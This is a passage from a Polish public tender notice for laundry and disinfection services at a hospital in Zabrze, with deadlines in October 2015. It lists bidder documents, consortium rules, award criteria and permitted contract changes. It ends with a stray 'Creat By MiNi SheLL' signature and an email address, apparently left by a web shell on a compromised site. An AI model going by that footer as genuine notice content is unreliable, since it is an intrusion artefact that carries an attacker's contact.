12)	karty charakterystyki dla wszystkich środków zawartych w wykazach używanych do realizacji zamówienia,
13)	pozytywna opinia Centrum Zdrowia Dziecka lub innej równoważnej instytucji dla środków do prania bielizny noworodkowej, niemowlęcej i dziecięcej.
14)	opracowane procedury:
- przyjmowania, transportu bielizny,
- prania i dezynfekcji całego asortymentu podlegającemu usłudze (w tym opis warunków prania, stosowanych środków, zakresu temperatur i czasu ich stosowania),
- czyszczenia i dezynfekcji całego wyposażenia, powierzchni, pomieszczeń pralni,
- higieny pracowników pralni.
15) dowód wniesienia wadium - kopia poświadczona przez Wykonawcę za zgodność z oryginałem

2. Dokumenty przedmiotowe dodatkowo wymagane od Wykonawców do przedstawienia wraz z ofertą:
a)	formularz ofertowy- załącznik nr 1 do SIWZ

3. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa powyżej w cz. XIII pkt 1 ppkt 1) składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Dokument, o którym mowa powyżej w cz. XIII pkt 3 zdanie pierwsze, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w cz. XIII pkt. 3 zdanie pierwsze, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Dokumenty zawierające odpowiednie oświadczenia powinny być wystawione odpowiednio nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się 
do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 

Ponadto, Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej ma obowiązek złożyć wraz z ofertą oświadczenia, o których mowa w cz. XIII.1 2) do XIII.1.4) włącznie i inne wymagane treścią SIWZ dokumenty. 

4.	Wymagania dodatkowe, gdy kilku wykonawców wspólnie ubiega się o udzielenie zamówienia
1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.
2)	W przypadku, o którym mowa w pkt. 1 powyżej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelką korespondencję związaną z prowadzonym postępowaniem Zamawiający będzie prowadził wyłącznie z ustanowionym pełnomocnikiem. Z tego względu należy w ofercie wyraźnie wskazać pełnomocnika reprezentującego Wykonawców oraz podać adres do doręczeń. Zamawiający przyjmuje, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.
3)	W przypadku, kiedy ofertę składa kilku Wykonawców wspólnie, oferta oraz wszystkie załączniki powinny być podpisane przez pełnomocnika ustanowionego przez tych Wykonawców. 
4)	W przypadku, kiedy kilku Wykonawców składa ofertę wspólnie, do oferty należy załączyć: 
a)	pełnomocnictwo, podpisane przez upoważnionych przedstawicieli wszystkich pozostałych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
b)	dokumenty wymienione w cz. XIII pkt 1ppkt. 1) niniejszej SIWZ wystawione indywidualnie dla każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
c)	oświadczenie każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dla każdego z nich indywidualnie - o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 i w art. 24 ust. 2 pkt 5 Ustawy,
d)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia - oświadczenie z art. 22 ustawy - Zamawiający dopuszcza, aby oświadczenie to zostało podpisane przez należycie umocowanego pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu,
e)	wspólny formularz ofertowy wraz z wszystkimi wymaganymi przez Zamawiającego załącznikami podpisany przez ustanowionego pełnomocnika, 
f)	inne dokumenty wymagane przez Zamawiającego. 

Uwaga dla Wykonawcy: Wypełniając Formularz Ofertowy, jak również inne dokumenty powołujące się na Wykonawcę w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące Wykonawców ubiegających się wspólnie o udzielenie zamówienia, a nie dane pełnomocnika. 

4a. Wymagania dla podmiotów, które będą realizowały część zamówienia, na których potencjał Wykonawca się powołał przy wykazywaniu spełniania warunków udziału w postępowaniu, zgodnie z art. 26 ust. 2b Ustawy:
a)	dokument wymieniony w cz. XIII pkt 1 ppkt. 1) niniejszej SIWZ wystawiony indywidualnie dla każdego z podmiotów na które Wykonawca będzie się powoływał przy spełnianiu warunków udziału w postępowaniu a które będą realizowały część zamówienia publicznego,
b)	oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w z art. 24 ust. 1 Ustawy (cz. XIII pkt 1 ppkt 3) indywidualnie dla każdego z podmiotów, na które Wykonawca będzie się powoływał przy spełnianiu warunków udziału w postępowaniu a które będą realizowali część zamówienia publicznego.

5. Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
- Zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona kopia dokumentu będzie nieczytelna lub wzbudzi wątpliwość co do jej prawdziwości.
- W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, na których zasobach polega Wykonawca, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
- Dokumenty złożone w języku obcym składane są wraz z tłumaczeniem na język polski.

6. Oświadczenia i dokumenty uzupełniane w trybie art. 26 ust. 3 ustawy Pzp, powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.

7. Zamawiający zgodnie z art. 24b Ustawy wezwie Wykonawców należących do tej samej grupy kapitałowej, którzy złożyli odrębne oferty o udzielenie w określonym terminie wyjaśnień dotyczących powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących między przedsiębiorcami, w celu ustalenia, czy zachodzą przesłanki wykluczenia wykonawcy.
1)	Zamawiający, oceniając wyjaśnienia, weźmie pod uwagę obiektywne czynniki w szczególności wpływ powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących między przedsiębiorcami, na ich zachowania w postępowaniu oraz przestrzeganie zasad uczciwej konkurencji.
2)	Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, który nie złożył wyjaśnień, oraz Wykonawcę, który nie złożył listy, o której mowa w cz. XIII.1.4)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotną zmianę postanowień zawartych w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w razie:
- konieczności zmiany ceny ofertowej brutto w sytuacji, gdy zmiana stawki podatku VAT będzie wynikała ze zmiany przepisów prawa, a nie z zastosowania nieprawidłowej stawki podatku VAT przez Wykonawcę.  
-  obniżenia cen jednostkowych netto przez Wykonawcę,
- wystąpienia siły wyższej, której zaistnienie Strona jest w stanie wykazać, co uniemożliwia wykonanie przedmiotu Umowy zgodnie z SIWZ.
- gdy w toku realizacji Umowy wystąpią zmiany stanu prawnego uniemożliwiające wykonywanie Umowy na dotychczasowych warunkach,
- zmiany terminu rozpoczęcia i/lub terminu zakończenia realizacji umowy,
- zmiany wynagrodzenia w razie zmiany minimalnego wynagrodzenia za pracę,
- zmiany wynagrodzenia w razie zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
Uwaga:
Zmiana osób upoważnionych do reprezentacji strony (do kontaktów) wymaga pisemnego powiadomienia drugiej Strony podpisanego przez osoby upoważnione do reprezentacji Strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.klinika-zabrze.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny w Zabrzu Sp. z o.o.
ul. M. Curie-Skłodowskiej 10
41-800 Zabrze
Pokój nr 2 (budynek administracji).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2015 godzina 10:00, miejsce: Szpital Specjalistyczny w Zabrzu Sp. z o.o.
ul. M. Curie-Skłodowskiej 10
41-800 Zabrze
Sekretariat Szpitala (budynek administracji).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zastosowana numeracja w Ogłoszeniu w Biuletynie Zamówień Publicznych jest zgodna z numeracją Zamawiającego w SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com